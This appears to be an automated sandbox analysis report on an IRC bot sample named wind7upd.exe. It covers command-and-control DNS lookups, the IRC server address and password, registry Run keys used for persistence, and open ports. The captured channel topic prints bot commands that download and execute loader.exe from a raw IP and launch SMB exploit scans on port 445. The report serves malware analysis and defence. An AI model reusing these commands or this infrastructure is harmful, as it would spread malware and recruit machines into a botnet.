Name Query Type Query Result Successful Protocol
kat.jatajoo.ru DNS_TYPE_A 91.207.6.166 1
gandu.marcandpatrick.net DNS_TYPE_A 218.61.22.10 1
hot.jatajoo.ru DNS_TYPE_A 89.149.244.22 1
218.61.22.10:1544
Nick: [00_AUT_XP_5687882]
Username: SP3-980
Server Pass: pacodedd
Joined Channel: ##f## with Password open
Channel Topic for Channel ##F##: “.asc -S|.http http://rapidshare.com/files/314789063/bay|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://89.149.244.22/loader.exe C:iehn.exe 1”
Private Message to Channel ##F##: “download// Created process: “C:iehn.exe”, PID: “
Private Message to Channel #modes: “HTTP SET http://rapidshare.com/files/314789063/bay”
Private Message to Channel ##F##: “scan// Random Port Scan started on 128.130.x.x:445 with a delay of 3 seconds for 0 minutes using 35 threads.”
Private Message to Channel ##F##: “download// File download: 27.1KB to: C:iehn.exe @ 27.1KB/sec.”
Private Message to Channel ##F##: “scan// Random Port Scan started on 128.x.x.x:445 with a delay of 3 seconds for 0 minutes using 15 threads.”
Private Message to Channel ##F##: “scan// Trying to get external IP.”
PASS pacodedd
Other details
* The following ports were open in the system:
Port Protocol Process
1055 TCP wind7upd.exe (%Windir%wind7upd.exe)
1056 TCP wind7upd.exe (%Windir%wind7upd.exe)
1057 TCP wind7upd.exe (%Windir%wind7upd.exe)
1058 TCP wind7upd.exe (%Windir%wind7upd.exe)
1280 TCP wind7upd.exe (%Windir%wind7upd.exe)
2383 TCP wind7upd.exe (%Windir%wind7upd.exe)
2384 TCP wind7upd.exe (%Windir%wind7upd.exe)
2385 TCP wind7upd.exe (%Windir%wind7upd.exe)
2386 TCP wind7upd.exe (%Windir%wind7upd.exe)
2387 TCP wind7upd.exe (%Windir%wind7upd.exe)
2388 TCP wind7upd.exe (%Windir%wind7upd.exe)
2389 TCP wind7upd.exe (%Windir%wind7upd.exe)
2390 TCP wind7upd.exe (%Windir%wind7upd.exe)
2391 TCP wind7upd.exe (%Windir%wind7upd.exe)
2392 TCP wind7upd.exe (%Windir%wind7upd.exe)
2393 TCP wind7upd.exe (%Windir%wind7upd.exe)
2394 TCP wind7upd.exe (%Windir%wind7upd.exe)
2395 TCP wind7upd.exe (%Windir%wind7upd.exe)
2396 TCP wind7upd.exe (%Windir%wind7upd.exe)
2397 TCP wind7upd.exe (%Windir%wind7upd.exe)
2398 TCP wind7upd.exe (%Windir%wind7upd.exe)
2399 TCP wind7upd.exe (%Windir%wind7upd.exe)
2400 TCP wind7upd.exe (%Windir%wind7upd.exe)
2401 TCP wind7upd.exe (%Windir%wind7upd.exe)
2402 TCP wind7upd.exe (%Windir%wind7upd.exe)
2403 TCP wind7upd.exe (%Windir%wind7upd.exe)
2404 TCP wind7upd.exe (%Windir%wind7upd.exe)
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%wind7upd.exe”
so that wind7upd.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%wind7upd.exe”
so that wind7upd.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
wind7upd.exe %Windir%wind7upd.exe 339 968 bytes